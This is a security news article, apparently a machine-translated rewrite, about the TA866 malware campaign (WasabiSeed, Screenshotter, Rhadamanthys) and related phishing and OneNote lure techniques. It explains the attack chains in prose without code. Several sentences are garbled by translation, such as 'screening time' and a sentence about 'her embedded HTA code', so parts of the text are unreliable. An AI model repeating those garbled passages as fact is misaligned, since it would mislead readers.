A previously unknown attacker is targeting companies in the United States and Germany with bespoke malware designed to steal sensitive information.
Proofpoint, an enterprise security company that tracks activity clusters under the name screening timesaid the group dubbed TA866which may be financially motivated.
“TA866 is linked to the availability of custom tools, the ability to purchase tools and services from other vendors, and the increasing activity of organized attackers capable of conducting well-thought-out attacks at scale. ‘, the company said.
The campaign launched by the attackers is said to have started around October 3, 2022. The attacks were launched via emails containing booby-trap attachments or URLs leading to malware. Attachments range from Microsoft Publisher files laced with macros to PDFs with URLs pointing to JavaScript files.
Intrusions also utilize conversation hijacking to lure recipients into clicking seemingly harmless URLs, initiating a multi-stage attack chain.
Regardless of the method you use, running the downloaded JavaScript file will launch the MSI installer and unpack the VBScript called WasabiSeed. It serves as a tool for retrieving the next stage of malware from remote servers.
One of the payloads downloaded by WasabiSeed is Screenshotter. This utility periodically takes screenshots of the victim’s desktop and sends the information to a command and control (C2) server.
“This is useful for attackers during the reconnaissance and victim profiling stages,” said Proofpoint researcher Axel F.
A successful reconnaissance phase is followed by post-exploitation malware distribution. Selected attacks deploy an AutoHotKey (AHK)-based bot to drop an information stealer called Rhadamanthys.
According to Proofpoint, the URLs used in the campaign contained a traffic direction system (TDS) called 404 TDS, which only allowed victims in scenarios where they met a certain set of criteria such as geography, browser application, and operating system. It allows attackers to deliver malware.
The origin of TA866 is still unknown, but Russian variable names and comments have been observed in the AHK bot source code, and its 2020 variant was used in attacks targeting Canadian and US banks. The malware is also suspected to have been used as far back as April 2019.
“Using Screenshotter to gather information about compromised hosts prior to deploying additional payloads demonstrates that attackers are manually confirming infections and identifying high-value targets. ,” said Proofpoint.
“It is important to note that a successful compromise would require the user to click a malicious link and, if successfully filtered, manipulate a JavaScript file to download and execute an additional payload. .”
The findings come amid a surge in threat actors trying new ways to execute code on targeted devices after Microsoft blocked macros in Office files downloaded from the internet by default.
This includes using search engine optimization (SEO) poisoning, malvertising, and brand spoofing to distribute malware by packaging payloads as popular software such as remote desktop apps and online meeting platforms includes.
Additionally, according to a new campaign documented by SentinelOne, fraudulent ads in Google search results were used to target unsuspecting users to fraudulent credential phishing designed to steal their Amazon Web Services (AWS) logins. You are redirecting to a website.
“The surge in malicious Google ads leading to AWS phishing websites poses a serious threat not only to the average user, but to network and cloud administrators,” said the cybersecurity firm.
“These attacks are easy to launch, and combined with the large and diverse audiences that Google Ads can reach, make them particularly powerful threats.”
Another technique that has seen a surge in recent months is the exploitation of new file formats such as Microsoft OneNote and Publisher documents to distribute malware.
This attack is similar to using other types of malicious Office files. The email recipient is tricked into opening the document, clicking the fake button, and running her embedded HTA code to get her Qakbot malware.
Sophos researcher Andrew Brandt said:
“OneNote .one notebooks will likely end up being truncated as email attachments as the next file format, but for now it remains a permanent risk.”
